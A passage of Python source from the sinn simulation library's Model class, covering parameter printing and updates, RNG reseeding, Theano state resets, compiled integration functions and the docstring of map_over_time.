Usage:\n            Print parameter info for model `model`::\n\n                >>> model.print_parameter_info()\n\n            Print parameter info for an arbitrary parameter set `params`\n            (may be dict, ParameterSet, ModelParams or IndexableNamespace)::\n\n                >>> from sinn import Model\n                >>> Model.print_parameter_info(params)\n\n            Mild formatting is used to keep the output human-readable.\n        \"\"\"\n
        if isinstance(self, (dict, sinn.ModelParams, mtb.typing.IndexableNamespace)):\n            # Method was called as a class method.\n            # 'self' is the provided argument, which is the paramset to print\n            Θ = self\n        else:\n            Θ = self.params\n
        for k, v in getattr(Θ, 'items', lambda: Θ)():\n            if isinstance(v, (dict, sinn.ModelParams, mtb.typing.IndexableNamespace)):\n                print(k)\n                Model.print_parameter_info(v, indent=indent+2)\n
            else:\n                broadcast = getattr(v, 'broadcastable', None)\n                if broadcast is None:\n                    broadcast = getattr(v, 'ndim', None)\n                    if broadcast is None:\n                        broadcast = ''\n                    else:\n                        broadcast = f\"{broadcast} dims\"\n
                shape = getattr(v, 'shape', \"\")\n                if shim.issymbolic(shape) and shim.graph.is_computable(v):\n                    shape = shape.eval()\n                shape = str(shape)\n                dtype = getattr(v, 'dtype', '')\n                print(\" \"*indent + f\"{k}: {type(v)}, \"\n                      f\"{broadcast}, {shape}, {dtype}\")\n\n\n
    # ==============================\n    # Methods which modify the model\n    # ==============================\n\n
    def lock(self):\n        for hist in self.history_set:\n            hist.lock()\n\n
    def clear(self, after=None):\n        \"\"\"\n        Invalidate the model data, forcing histories to be recomputed the next\n        time they are queried.\n        Functionally equivalent to clearing the data, keeping the padding.\n        Discards symbolic updates by calling `shim.reset_updates()` and\n        `~History.theano_reset()`.\n\n
        Parameters\n        ----------\n        after: AxisIndex\n            If given, history will only be cleared after this point.\n            `cur_tidx` will be set to `after`, rather than `t0idx-1`.\n        \"\"\"\n
        if shim.is_symbolic(after):\n            raise TypeError(\n                \"`clear` requires a numeric (not symbolic) time index.\")\n        shim.reset_updates()\n
        if after is not None:\n            after = self.time.Index(after)\n            for hist in self.unlocked_histories:\n                hist.clear(after=after.convert(hist.time.Index))\n        else:\n            for hist in self.unlocked_histories:\n                hist.clear()\n\n
    def eval(self, max_cost: Optional[int]=None, if_too_costly: str='raise'):\n        \"\"\"\n        Remove all symbolic dependencies by evaluating all ongoing updates.\n        If the update is present in `shim`'s update dictionary, it's removed\n        from there.\n\n
        Parameters\n        ----------\n        max_cost: int | None (default: None)\n            Passed on to :func:`theano_shim.graph.eval`. This is a heuristic\n            to guard against accidentally expensive function compilations.\n            Value corresponds to the maximum number of nodes in the\n            computational graph. With ``None``, any graph is evaluated.\n            The cost is evaluated per history.\n\n
        if_too_costly: 'raise' | 'ignore'\n            Passed on to :func:`theano_shim.graph.eval`.\n            What to do if `max_cost` is exceeded.\n\n
        Returns\n        -------\n        None\n            Updates are done in place.\n\n
        **Side-effects**\n            Removes updates from :attr:`theano_shim.config.symbolic_updates`.\n\n
        .. Todo:: Currently each symbolic variable is compiled and evaluated\n           separately with shim.eval(). 
Wouldn't it be better to compile a\n           single update function ?\n        \"\"\"\n        for h in self.history_set:\n            h.eval(max_cost, if_too_costly)\n\n
    def theano_state_is_clean(self):\n        if shim.pending_updates():\n            return False\n        for hist in self.unlocked_histories:\n            # if (hist._num_tidx is not hist._sym_tidx\n            #     or hist._num_data is not hist._sym_data):\n            if hist._taps:\n                return False\n
        for rng in self.rng_inputs:\n            if (isinstance(rng, shim.config.SymbolicRNGTypes)\n                and len(rng.state_updates) > 0):\n                return False\n        return True\n\n
    def theano_reset(self, warn_rng=True):\n        \"\"\"\n        Put model back into a clean state, to allow building a new Theano graph.\n\n
        .. warning:: If there are dependencies on RNGs, those will be removed.\n           This is necessary to avoid having disconnected RNGs appear in the\n           symbolic graph. For NumPy RNGs, this is inconsequential.\n           However, for Theano RNGs, this means that `self.rng.seed(0)`\n           **will not set the simulator in a predictable state**. The reason\n           is that when using Theano, `self.rng` is in fact a *collection* of\n           RNGs. When we remove an RNG from this collection, `self.seed` then\n           has no way of knowing it should reset it.\n\n
           The method `self.reseed_rngs` is provided to reseed the RNGs created\n           and disconnected by `get_advance_updates`.\n\n
        Parameters\n        ----------\n        warn_rng: bool\n            If True (default), emit a warning if updates to a\n            random number generator were cleared.\n\n
        **Side-effects**: Clears all symbolic updates in shim.\n        \"\"\"\n        shim.reset_updates()\n\n
        for hist in self.history_set:\n            hist.theano_reset()\n        for kernel in self.kernel_list:\n            kernel.theano_reset()\n\n
        for rng in self.rng_inputs:\n            if (isinstance(rng, shim.config.SymbolicRNGTypes)\n                and len(rng.state_updates) > 0 and warn_rng):\n                rng_name = getattr(rng, 'name', str(rng))\n                if rng_name is None: rng_name = str(rng)\n                warn(\"Erasing random number generator updates. Any \"\n                     \"other graphs using this generator are likely \"\n                     \"invalidated.\\n\"\n                     \"RNG: {}\".format(rng_name))\n                rng.state_updates = []\n
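\n    # Usage sketch (illustrative only; `model` is a hypothetical instance of a\n    # concrete Model subclass). After compiling an advance function, one would\n    # typically reset the symbolic state and reseed the RNGs for reproducibility:\n    #\n    #     model.theano_reset(warn_rng=False)  # discard stale symbolic updates\n    #     model.reseed_rngs(seed=314)         # put the RNGs back in a predictable state\n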
    def reseed_rngs(self, seed):\n        \"\"\"\n        Reset all model RNGs into a predictable state.\n        \"\"\"\n
        # TODO?: Allow resetting only certain entries in _advance_updates ?\n        #        Or: Option for each entry to be seeded the same way ?\n        rngs = {id(rng): rng for rng in self.rng_inputs}\n        # Dictionary allows multiple submodels to have an RNG, as long\n        # as it is shared.\n
        if len(rngs) == 0:\n            logger.warning(f\"Model {self} has no RNGs; nothing to reseed.\")\n        if len(rngs) > 1:\n            raise NotImplementedError(\"`reseed_rngs` doesn't support models \"\n                                      \"with multiple random number generators.\")\n
        rng = next(iter(rngs.values()))\n        cur_state_updates = getattr(rng, 'updates', None)\n        if cur_state_updates:\n            cur_state_updates = cur_state_updates()\n
        # Each compiled function maps to a different cache_key in _rng_updates\n        # Iterate over each set of updates and reseed the RNGs\n        if len(self._rng_updates) > 1:\n            warn(\"Support for multiple compiled integration functions is still \"\n                 \"WIP. For reliably deterministic reseeding of RNGs, ensure \"\n                 \"only one function is compiled.\")\n
        _num_updates = None\n        for update_stash in self._rng_updates.values():\n            stashed_state_updates = update_stash.get(rng, [])\n            if cur_state_updates is None and stashed_state_updates:\n                raise RuntimeError(f\"The model {self.name} seems to have recorded \"\n                                   \"Theano state updates, but uses a plain NumPy \"\n                                   \"RNG. This is likely a bug in sinn.Model\")\n
            elif stashed_state_updates:\n                # We have a Theano RNG, either RandomStream or MRG\n                # We know cur_state_updates is a list, because we didn't raise RuntimeError\n                # Assumption: Any stashed state updates should come before current ones\n                # (in fact, `cur_state_updates` should probably always be empty)\n                rng.state_updates = stashed_state_updates + cur_state_updates\n
                if _num_updates is None:\n                    _num_updates = len(rng.state_updates)\n                elif _num_updates != len(rng.state_updates):\n                    warn(\"There are multiple compiled integration functions, and they \"\n                         \"update the RNG state a different number of times. This \"\n                         \"will still work, in the sense that the model \"\n                         \"can be integrated without errors. However, we have not \"\n                         \"confirmed that the results are entirely deterministic: \"\n                         \"they may depend on the order in which the functions are \"\n                         \"compiled, or whether another function is compiled or not.\")\n
            # Having reattached state updates, rng.seed will update them all\n            shim.reseed_rng(rng, seed)\n            # Detach the state updates to return the graph in the state it was before\n            if stashed_state_updates:\n                rng.state_updates = rng.state_updates[len(stashed_state_updates):]\n                # NB: `reseed_rng` has changed the state updates, so we can't\n                #     just reuse cur_state_updates.\n\n
        # Finish by reseeding the current RNG state\n        # This may not be necessary when `_rng_updates` is not empty, but it\n        # is conceivable at least that the updates to `stashed_state_updates`\n        # would depend on the extra values in `cur_state_updates`.\n        # Certainly, when `_rng_updates` is empty, this line is essential,\n        # since otherwise `seed` is never used anywhere.\n        shim.reseed_rng(rng, seed)\n\n
        # The code below did not require stashing RNG updates, but only works\n        # with RandomStream (MRG updates cannot as easily be identified in\n        # the symbolic updates, because they appear as complex expressions\n        # rather than special RNG types)\n        # # Find all the Theano RNG streams and reseed them.\n        # # This is analogous to what `seed` does with the streams listed in `rng.state_updates`\n        # srs = sys.modules.get('theano.tensor.shared_RandomStream', None)\n        # if srs is not None:\n        #     seedgen = rng.gen_seedgen  # Was seeded by `reseed_rng` above\n        #     for update_dict in self._advance_updates.values():\n        #         for v in update_dict:\n        #             if isinstance(v, srs.RandomStateSharedVariable):\n        #                 old_r_seed = seedgen.randint(2 ** 30)\n        #                 v.set_value(np.random.RandomState(int(old_r_seed)),\n        #                             borrow=True)\n\n
    def update_params(self, new_params: ModelParams, clear: bool=True, **kwargs):\n        \"\"\"\n        Update model parameters.\n        Clears any kernel cache which depends on these parameters.\n        By default, also clears unlocked histories: if one assumes stationarity\n        of parameters, then a parameter change invalidates histories.\n\n
        TODO: Make `new_params` a dict and just update parameters in the dict.\n\n
        Parameters\n        ----------\n        new_params: ModelParams | dict\n            New parameter values.\n        clear:\n            True (default): Also clear unlocked histories.\n            False: Don't clear any history.\n        **kwargs:\n            Alternative to specifying parameters with `new_params`.\n            Keyword arguments take precedence over values in `new_params`.\n        \"\"\"\n
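        # Usage sketch (illustrative only; the parameter name `τ` is hypothetical):\n        #\n        #     model.update_params({'τ': 0.3})          # clears unlocked histories\n        #     model.update_params(τ=0.3, clear=False)  # keyword form; keep histories\n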
\n        ## Parse new parameters into the format defined by self.Parameters\n        if isinstance(new_params, ModelParams):\n            new_params = new_params.dict()\n        if len(kwargs) > 0:\n            new_params = {**new_params, **kwargs}\n        pending_params = self.Parameters.parse_obj(\n            {**self.params.dict(), **new_params}\n        ).get_values()\n
        # Calling `Parameters` validates all new parameters but converts them to shared vars\n        # Calling `get_values` converts them back to numeric values\n\n
        ## Clear kernel caches\n        # TODO: Everything with old_ids & clear_advance_fn should be deprecatable\n        # We don't need to clear the advance function if all new parameters\n        # are just the same Theano objects with new values.\n\n
        old_ids = {name: id(val) for name, val in self.params}\n        # clear_advance_fn = any(id(getattr(self.params, p)) != id(newp)\n        #                        for p, newp in pending_params.dict().items())\n\n
        # Determine the kernels for which parameters have changed\n        kernels_to_update = []\n        for kernel in self.kernel_list:\n            if set(kernel.__fields__) & set(new_params.keys()):\n                kernels_to_update.append(kernel)\n\n
        # Loop over the list of kernels and do the following:\n        # - Remove any cached binary op that involves a kernel whose parameters\n        #   have changed (And write it to disk for later retrieval if these\n        #   parameters are reused.)\n        # Once this is done, go through the list of kernels to update and\n        # update them\n
        for obj in self.kernel_list:\n            if obj not in kernels_to_update:  # Updated kernels cached below\n                for op in obj.cached_ops:\n                    for kernel in kernels_to_update:\n                        if hash(kernel) in op.cache:\n                            # FIXME: Should use newer mtb.utils.stablehash\n                            obj = op.cache[hash(kernel)]\n                            diskcache.save(str(hash(obj)), obj)\n                            # TODO subclass op[other] and define __hash__\n                            logger.monitor(\"Removing cache for binary op {} ({},{}) from heap.\"\n                                           .format(str(op), obj.name, kernel.name))\n                            del op.cache[hash(kernel)]\n\n
        for kernel in kernels_to_update:\n            # FIXME: Should use newer mtb.utils.stablehash\n            diskcache.save(str(hash(kernel)), kernel)\n            kernel.update_params(**pending_params.dict())\n\n
        ## Update self.params in place\n        # Check that update is safe\n        cur_Θset_info = ParameterSet(mtb.theano.varcollection_typeinfo(self.params.get_values()))\n        new_Θset_info = ParameterSet(mtb.theano.varcollection_typeinfo(pending_params))\n
        errmsgs = []\n        for θkey, new_θinfo in new_Θset_info.flatten().items():\n            cur_θinfo = cur_Θset_info[θkey]\n            if new_θinfo != cur_θinfo:\n                errmsgs.append(f\"{θkey}\\n  Current value: {cur_θinfo}\\n\"\n                               f\"  New value    : {new_θinfo}\")\n
        if errmsgs:\n            msg = (\"Some update values do not match the type or shape of \"\n                   \"their associated current value.\\n\")\n            msg += \"\\n\".join(errmsgs)\n            msg += (\"\\n\\nTheano requires that these remain unchanged between \"\n                    \"compilation and execution.\")\n            raise RuntimeError(msg)\n
        # Perform update\n        self.params._set_values(pending_params)\n        self.set_submodel_params()\n        # TODO:Numeric: Remove this once `numeric()` returns a View\n        # (At present we invalidate the _numeric cache when the data or params\n        # change, so that subsequent calls to `numeric` get the updated data.)\n        self._numeric = None\n\n
        ## Cleanup: clear histories/compiled fns if necessary\n\n
        # NB: I think the only way params can change identity is if we have\n        #     a nested model and `set_submodel_params` reassigns them.\n        clear_advance_fn = any(id(val) != old_ids[name]\n                               for name, val in self.params)\n\n
        logger.debug(\"Model params are now {}.\".format(self.params))\n\n
        if clear:\n            logger.info(\"Clearing unlocked histories because parameters have changed.\")\n            self.clear()\n
        if clear_advance_fn:\n            # Only clear advance function when necessary, since it forces a\n            # recompilation of the graph.\n            # We need to do this if any of the parameters change identity (e.g.\n            # replaced by another shared variable).\n            
self._compiled_advance_fns.clear()\n\n
    # FIXME: This function was originally written when the update dictionary\n    #        would also include all symbolic updates to histories (through _sym_tidx\n    #        and _sym_data).\n    #        It also does not seem used (or at least is not covered by a test).\n    #        We should see if it appears in usage, and if so, make a test for it.\n    #        Otherwise removal is probably advisable.\n
    def eval_updates(self, givens=None):\n        \"\"\"\n        Compile and evaluate a function evaluating the `shim` update\n        dictionary. Histories' internal variables tracking symbolic updates\n        are unused and untouched.\n        If the updates have symbolic inputs, provide values for them through\n        the `givens` argument.\n        If there are no pending symbolic updates, no function is compiled, so you\n        can use this as a safeguard at the top of a function to ensure there are\n        no unapplied updates, without worrying about the cost of repeated calls.\n        \"\"\"\n
        warn(\"The way symbolic updates are tracked has changed, but since the \"\n             \"method `eval_updates` had no clear use case, it was not updated. \"\n             \"Please report your use case, so we can determine whether this \"\n             \"method is still relevant. In the affirmative, adding a test for \"\n             \"it would also be nice.\")\n
        # TODO: Should this function also evaluate symbolic updates in _taps ?\n        #       Depends what it's meant for. (See also eval(), which would do something\n        #       similar without the non-tap updates.)\n
        upds = shim.get_updates()\n        if len(upds) > 0:\n            f = shim.graph.compile([], [], updates=upds, givens=givens)\n            f()\n
        # for h in self.history_set:\n        #     if h._sym_tidx != h._num_tidx:\n        #         object.__setattr__(h, '_sym_tidx', h._num_tidx)\n        #     if h._sym_data != h._num_data:\n        #         object.__setattr__(h, '_sym_data', h._num_data)\n\n
    # ==============================================\n    # Model advancing code\n    #\n    # This code isn't 100% generic yet;\n    # look for TODO tags for model-specific hacks\n    #\n    # Function overview: (NEEDS UPDATE)\n    # - integrate(self, stop): User-facing function. Synonym: `advance`\n    # - _advance(self): Returns a function; use as `self._advance(stop)`:\n    #   `self._advance` is a property which memoizes the compiled function.\n    # - compile_advance_function(self): Function called by `_advance` the first\n    #   time to do the compilation. Could conceivably also be used by a user.\n    #   Returns a compiled function.\n    # - advance_updates(self, stoptidx): Function used by\n    #   `compile_advance_function` to retrieve the set of symbolic updates.\n    # ==============================================\n
    def get_state(self, tidx=None):\n        \"\"\"\n        Return a State object corresponding to the state at time `tidx`.\n        If no tidx is given, uses `self.cur_tidx` to return the current state.\n        TODO: Add support for >1 lags.\n        \"\"\"\n
        ti = self.cur_tidx if tidx is None else tidx  # Honour `tidx` when given, as documented\n        return self.State(*(h[ti-self.t0idx+h.t0idx] for h in self.statehists))\n
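\n    # Usage sketch (illustrative only; `model` is a hypothetical Model instance):\n    #\n    #     model.integrate(upto='end')   # fill state histories up to the last time point\n    #     state = model.get_state()     # State tuple at the current time index\n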
    def integrate(self,\n                  upto: Union[int, float],\n                  histories: Union[Tuple[History],History]=()):\n        \"\"\"\n        Advance (i.e. integrate) a model.\n        For a non-symbolic model the usual recursion is used – it's the\n        same as calling `hist[end]` on each history in the model.\n        For a symbolic model, the function constructs the symbolic update\n        function, compiles it, and then evaluates it with `end` as argument.\n        The update function is compiled only once, so subsequent calls to\n        `advance` are much faster and benefit from the acceleration of running\n        on compiled code.\n\n
        Parameters\n        ----------\n        upto: int, float, AxisIndex\n            Compute history up to this point (inclusive).\n            May also be the string 'end'.\n            If an AxisIndex, it must be compatible with ``self.time``.\n        histories: Tuple of histories to integrate. State histories do not need to\n            be included; they are added automatically.\n            If only one history is specified, it doesn't need to be wrapped in\n            a tuple.\n            The value 'all' can be used to specify integrating all histories.\n        \"\"\"\n
        end = upto\n        if isinstance(histories, Generator_):\n            histories = tuple(histories)  # We will iterate more than once\n        elif histories == 'all':\n            histories = tuple(h for h in self.unlocked_nonstatehists)\n        elif isinstance(histories, History):\n            histories = (histories,)\n
        # Remove any locked histories\n        if any(h.locked for h in histories):\n            warn(\"You requested to integrate the following histories, but they \"\n                 f\"are locked: {[h.name for h in histories if h.locked]}.\")\n            histories = tuple(h for h in histories if not h.locked)\n
        # Remove redundant histories, so cache keys are consistent\n        histories = tuple(h for h in histories if h not in self.statehists)\n\n
        # TODO: Rename endtidx -> endidx\n        if end == 'end':\n            endtidx = self.tnidx\n        else:\n            if isinstance(end, AbstractAxisIndex):\n                end = end.convert(self.time)\n            endtidx = self.get_tidx(end, allow_rounding=True)\n\n
        # Make sure we don't go beyond given data\n        for hist in self.history_set:\n            if hist.locked:\n                tnidx = hist._num_tidx.get_value()\n                if tnidx < endtidx.convert(hist.time):\n                    endtidx = hist.time.Index(tnidx).convert(self.time)\n                    if not endtidx.in_bounds:\n                        assert endtidx < hist.time.t0idx  # I don't see how we could exceed the upper bound\n                        warn(\"History '{}' was locked before being computed. \"\n                             \"Integration aborted.\".format(hist.name))  # No need to abort explicitly: `curtidx` will be larger than `endtidx`\n                    else:\n                        warn(\"Locked history '{}' is only provided \"\n                             \"up to t={}. Output will be truncated.\"\n                             .format(hist.name, self.get_time(endtidx)))\n\n
        if not shim.config.use_theano:\n            for hist in self.statehists:\n                hist._compute_up_to(endtidx.convert(hist.time))\n            for hist in histories:\n                hist._compute_up_to(endtidx.convert(hist.time))\n\n
        else:\n            # if not shim.graph.is_computable(\n            #         [hist._sym_tidx for hist in self.statehists]):\n            #     raise TypeError(\"Integrating models is only implemented for \"\n            #                     \"histories with a computable current time \"\n            #                     \"index (i.e. 
the value of `hist._sym_tidx` \"\n # \"must only depend on symbolic constants and \"\n # \"shared vars).\")\n # if shim.pending_updates():\n # raise RuntimeError(\"There \"\n # \"are symbolic inputs to the already present updates:\"\n # \"\\n{}.\\nEither discard them with `theano_reset()` or \"\n # \"evaluate them with `eval_updates` (providing values \"\n # \"with the `givens` argument) before advancing the model.\"\n # .format(shim.graph.inputs(shim.get_updates().values())))\n curtidx = self.get_min_tidx(histories + tuple(self.statehists))\n assert(curtidx >= -1)\n\n if curtidx < endtidx:\n # TODO:Numeric: Remove this once `numeric()` returns a View\n # (At present we invalidate the _numeric cache when the data changes,\n # so that subsequent calls to `numeric` get the updated data.)\n self._numeric = None\n for h in self.history_set:\n h._numeric = None\n self._advance(histories)(curtidx, endtidx+1)\n # _advance applies the updates, so should get rid of them\n self.theano_reset()\n\n @property\n def no_histories_have_updates(self):\n \"\"\"\n Return `True` if none of the model's histories have unevaluated\n symbolic updates.\n \"\"\"\n # no_updates = all(h._sym_tidx is h._num_tidx\n # and h._sym_data is h._num_data\n no_updates = all(h._latest_tap == 0\n for h in self.history_set)\n # if no_updates and len(shim.get_updates()) > 0:\n # raise RuntimeError(\n # \"Unconsistent state: there are symbolic theano updates \"\n # \" (`shim.get_updates()`) but none of the model's histories \"\n # \"has a symbolic update.\")\n # elif not no_updates and len(shim.get_updates()) == 0:\n # hlist = {h.name: (h._sym_tidx, h._sym_data) for h in self.history_set\n # if h._sym_tidx is not h._num_tidx\n # and h._sym_data is not h._num_data}\n # raise RuntimeError(\n # \"Unconsistent state: some histories have a symbolic update \"\n # \"({}), but there are none in the update dictionary \"\n # \"(`shim.get_updates()`)\".forma(hlist))\n return no_updates\n\n def _get_cache_key(self, histories=()):\n # The compiled function depends both on the histories we want to update,\n # and on which histories are locked.\n return (histories, tuple(sorted(self.locked_histories)))\n\n def _advance(self, histories=()):\n \"\"\"\n Attribute which memoizes the compilation of the advance function.\n\n Parameters\n ----------\n histories: Set of histories to update. 
State histories do not need to\n be included; they are added automatically.\n \"\"\"\n cache_key = self._get_cache_key(histories)\n if cache_key not in self._advance_updates:\n self._advance_updates[cache_key] = self.get_advance_updates(histories)\n _advance_updates = self._advance_updates[cache_key]\n # DEBUG\n # for i, s in enumerate(['base', 'value', 'start', 'stop']):\n # self._advance_updates[self.V._num_data].owner.inputs[i] = \\\n # shim.print(self._advance_updates[self.V._num_data]\n # .owner.inputs[i], s + ' V')\n # self._advance_updates[self.n._num_data].owner.inputs[i] = \\\n # shim.print(self._advance_updates[self.n._num_data]\n # .owner.inputs[i], s + ' n')\n if self.no_histories_have_updates:\n if cache_key not in self._compiled_advance_fns:\n logger.info(\"Compiling the update function\")\n self._compiled_advance_fns[cache_key] = self.cached_compile(\n [self.curtidx_var, self.stoptidx_var], [], _advance_updates)\n logger.info(\"Done.\")\n _advance_fn = self._compiled_advance_fns[cache_key]\n else:\n # TODO: Use _compiled_advance_fns to cache these compilations\n # We would need to cache the compilation for each different\n # set of symbolic updates.\n if histories != ():\n raise NotImplementedError(\n \"Not hard to implement; I am just waiting for a case where this is needed.\")\n advance_updates = OrderedDict(\n (var, shim.graph.clone(upd, replace=shim.get_updates()))\n for var, upd in _advance_updates.items())\n\n logger.info(\"Compiling the update function\")\n _advance_fn = self.cached_compile(\n [self.curtidx_var, self.stoptidx_var], [], advance_updates)\n logger.info(\"Done.\")\n\n # I think the point of this lambda is to allow keyword args\n return lambda curtidx, stoptidx: _advance_fn(curtidx, stoptidx)\n\n def get_advance_updates(self, histories=()):\n \"\"\"\n Returns a 'blank' update dictionary. Update graphs do not include\n any dependencies from the current state, such as symbolic/transformed\n initial conditions.\n\n Parameters\n ----------\n histories: Set of histories to update. State histories do not need to\n be included; they are added automatically.\n \"\"\"\n cache_key = self._get_cache_key(histories)\n\n logger.info(\"Constructing the update graph.\")\n # Stash current symbolic updates\n # for h in self.statehists:\n for h in self.history_set:\n h._stash() # Stash unfinished symbolic updates\n updates_stash = shim.get_updates()\n # NB: If _rng_updates is in sync with _advance_updates (as it should), the assertion below always succeeds\n assert len(self._rng_updates[cache_key]) == 0, \"`sinn.Model._rng_updates should only be modified by `get_advance_updates`\"\n shim.reset_updates()\n\n # Get advance updates\n updates = self.advance_updates(self.curtidx_var, self.stoptidx_var, histories)\n # Store the RNG updates so they can be used for reseeding RNGs\n for rng in self.rng_inputs:\n self._rng_updates[cache_key][rng] = rng.updates()\n # Reset symbolic updates to their previous state\n shim.reset_updates()\n self.theano_reset(warn_rng=False)\n # theano_reset() is half redundant with reset_updates(), but we\n # still need to reset the RNG updates\n # for h in self.statehists:\n for h in self.history_set:\n h._stash.pop()\n shim.config.symbolic_updates = updates_stash\n logger.info(\"Done constructing the update graph.\")\n return updates\n\n def cached_compile(self, inputs, outputs, updates, **kwargs):\n \"\"\"\n A wrapper around `shim.graph.compile` which caches the result to disk\n and retrieves it when possible.\n\n .. 
Note:: Although all arguments to `shim.graph.compile` are supported,\n caching is disabled when arguments other than `inputs`, `outputs`\n and `updates` are specified.\n With additional development and testing, it should be possible to\n support other arguments.\n \"\"\"\n if kwargs:\n warn(\"Compilation caching is disabled when keyword arguments other \"\n \"than `inputs`, `outputs` and `updates` are specified.\")\n fn = None\n cache = False\n else:\n fn = self.compile_cache.get(outputs, updates, rng=self.rng_inputs)\n cache = True\n if fn is None:\n fn = shim.graph.compile(inputs, outputs, updates=updates, **kwargs)\n if cache:\n self.compile_cache.set(outputs, updates, fn, rng=self.rng_inputs)\n else:\n logger.info(\"Compiled advance function loaded from cache.\")\n return fn\n\n def advance_updates(self, curtidx, stoptidx, histories=()):\n \"\"\"\n Compute model updates from curtidx to stoptidx.\n\n Parameters\n ----------\n curtidx: symbolic (int):\n We want to compute the model starting from this point exclusive.\n (`curtidx` is the latest already computed point, so we start at\n ``curtidx + 1``)\n stoptidx: symbolic (int)\n We want to compute the model up to this point exclusive.\n histories: Set of histories to update. State histories do not need to\n be included; they are added automatically.\n\n Returns\n -------\n Update dictionary:\n Compiling a function and providing this dictionary as 'updates' will return a function\n which fills in the histories up to `stoptidx`.\n\n .. rubric:: For developers\n You can find a documented explanation of the function's algorithm\n in the internal documentation: :doc:`/docs/internal/Building an integration graph.ipynb`.\n \"\"\"\n\n histories += tuple(h for h in self.unlocked_statehists if h not in histories)\n # Build the update dictionary by computing each history forward by one step.\n for h in histories:\n h(h._num_tidx+1)\n # The way we do this, at time point k, we evaluate k+1\n # => Start iterations at the _current_ k, and stop one early\n # => curtidx is included below, and we do stoptidx-1\n return self.map_over_time(None, shim.get_updates(), curtidx, stoptidx-1, histories)\n\n def map_over_time(self,\n f : Optional[Callable[[sinn.axis.SymbolicAbstractAxisIndex], Any]]=None,\n updates : Optional[dict]=None,\n curtidx =None,\n stoptidx =None,\n histories: Tuple[History,...]=()\n ):\n \"\"\"\n Return the computational graph of the function `f` evaluated at all\n time points between `curtidx` (inclusive) and `stoptidx` (exclusive).\n The caller is responsible for compiling this graph into a function.\n\n Assumptions:\n\n - During graph creation, all unlocked histories are synchronized\n (their current time indices match, after correcting for padding).\n A RuntimeError is raised if this is not the case.\n - *Unlocked* histories have their current index ≥ `curtidx`.\n - *Locked* histories have their current index ≥ `stoptidx` - 1.\n - Expressions in `updates` and `shim.get_updates()` correspond to\n *pointwise* (or one-step-ahead) computations.\n\n Expressions in both `f` and `updates` may depend on any number of\n `_num_tidx` variables attached to histories (which correspond to that\n history's current time index).\n Concretely, this function thus evaluates `f`, replaces all `_num_tidx`\n variables by an appropriately shifted `curtidx`, and creates a Theano\n `scan` op, which iterates over time points. 
The op does three things:\n\n
        - Collect the evaluations of `f`.\n        - Advance any unlocked histories.\n        - Iterate additional updates listed in `updates`.\n\n
        Like `scan`, `map_over_time` returns two variables, *outputs* and\n        *updates*.\n        *Outputs* are the evaluations of `f`.\n        *Updates* combine updates for the histories and the variables listed\n        in `updates`.\n\n
        .. Note:: This function will fail if `f` is None and there are neither\n           pending symbolic updates on the model's unlocked histories nor\n           entries in the `updates` dictionary. Moreover, these updates must\n           depend on at least one history time index which can be related to the\n           model's time index, such that they can be iterated through the scan.\n\n
        .. Important:: `updates` dependencies across time steps are *integrable*\n           but not *differentiable*. Example: one could attempt to accumulate a\n           loss by passing the pair `{loss: loss + loss_function(t)}`. The\n           `integrate` method in this case would correctly accumulate the loss,\n           since at each time step updates are applied as prescribed. However\n           Theano would then not include these updates when unrolling the graph\n           for backpropagation, and the gradient would depend only on t0.\n\n
        Parameters\n        ----------\n        f: callable: time index -> value(s)\n            Function to evaluate at each time point between `curtidx` and\n            `stoptidx`.\n            Must take a single input (the time index at which to evaluate `f`);\n            can return one or many values.\n
        updates: dict (update dictionary)\n            Default: `shim.get_updates()`\n            A Theano update dictionary. The updates should correspond to one\n            time point update from ``self.num_tidx`` to ``self.num_tidx+1``.\n            This function will then iterate over these updates from\n            `curtidx` to `stoptidx`.\n
        curtidx: symbolic (int):\n            Default: `self.curtidx_var`\n            We want to compute the model starting from this point inclusive.\n
        stoptidx: symbolic (int)\n            Default: `self.stoptidx_var`\n            We want to compute the model up to this point exclusive.\n
        histories:\n            List of histories which we want to update. 
This only affects which\n            histories are included in the update dictionary: the histories\n            which are computed are exactly those required to compute `f`.\n            This can be used to avoid storing the output from intermediate\n            histories: since they are not ultimately stored, when compiling,\n            Theano will know it can discard their value once they are no longer\n            needed.\n            Default is not to update any history, making the evaluation of `f`\n            free of side effects.\n\n
        Returns\n        -------\n        SymbArray or List[SymbArray] (if `f` ≠ None):\n            The result of `f`, evaluated at each time point.\n            When `f` is not None, the output shape is the same as `scan`:\n\n
            - If `f` returns a single value, returns a symbolic array,\n              of length equal to ``stoptidx - curtidx``.\n            - If `f` returns multiple values, returns a list of symbolic arrays,\n              each of length equal to ``stoptidx - curtidx``.\n              The order of arrays matches the order in which `f` returns values.\n            - If `f` is None, only the update dictionary is returned.\n\n
        Update dictionary:\n            Can be passed as the `updates` parameter when compiling a function\n            to update shared variables; the most common use case is to fill\n            histories up to `stoptidx` - 1.\n            The returned dictionary will include updates for:\n\n
            - The `_num_data` shared variable(s) underlying any unlocked history\n              required to compute `f`.\n            - The `_num_data` shared variable(s) underlying all additional\n              unlocked histories listed in `histories`.\n            - Any additional updates provided with the `updates` argument.\n              (Which will have been converted from point-wise to iterated\n              from `curtidx` to `stoptidx`.)\n\n
        Raises\n        ------\n        TypeError:\n            - If `curtidx` or `stoptidx` cannot be cast to the index type of\n              the histories.\n        NotImplementedError:\n            - If there are no unlocked histories.\n        RuntimeError:\n            - If the update dictionary is empty.\n            - If the update dictionary has no dependency on any time index.\n              (Or all such dependencies are to locked histories.)\n            - If the unlocked histories are not synchronized.\n\n
        .. rubric:: For developers\n        You can find a documented explanation of the function's algorithm\n        in the internal documentation: :doc:`/docs/internal/Building an integration graph.ipynb`.\n        \"\"\"\n
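        # Usage sketch (illustrative only; `model.x` is a hypothetical history,\n        # and round-bracket indexing triggers its symbolic update):\n        #\n        #     def sq(tidx):\n        #         return model.x(tidx)**2\n        #     outs, upds = model.map_over_time(sq)   # symbolic graphs; caller compiles them\n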
        # TODO: Replace curtidx by startidx everywhere appropriate\n        # Default values\n        if updates is None: updates = shim.get_updates()\n        if curtidx is None: curtidx = self.curtidx_var\n        if stoptidx is None: stoptidx = self.stoptidx_var\n\n
        if not all(np.can_cast(stoptidx.dtype, hist.tidx_dtype)\n                   for hist in self.statehists):\n            raise TypeError(\"`stoptidx` cannot be safely cast to a time index. \"\n                            \"This can happen if e.g. a history uses `int32` for \"\n                            \"its time indices while `stoptidx` is `int64`.\")\n\n
        if len(list(self.unlocked_histories)) == 0:\n            pass\n            # raise NotImplementedError(\n            #     \"Cannot build a function iterating over time points if there \"\n            #     \"are no unlocked histories.\")\n
